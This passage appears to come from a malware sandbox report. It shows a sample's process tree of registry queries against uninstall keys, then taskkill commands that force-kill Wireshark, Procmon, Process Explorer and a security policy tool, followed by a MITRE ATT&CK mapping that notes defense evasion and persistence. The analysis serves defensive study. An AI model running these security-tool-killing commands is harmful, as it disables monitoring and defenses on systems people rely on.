    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4464
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4736
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4876
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:5000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4172
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:1676
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4320
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4468
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4480
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:5012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:5080
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4768
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1676
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4508
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5096
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5076
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4108
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4840

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1528-96-0x000001CAEA510000-0x000001CAEA511000-memory.dmp

Filesize
4KB

Download
memory/1528-83-0x00007FFB7D070000-0x00007FFB7DA5C000-memory.dmp

Filesize
9.9MB

Download
memory/1528-90-0x000001CAE8350000-0x000001CAE8351000-memory.dmp

Filesize
4KB

Download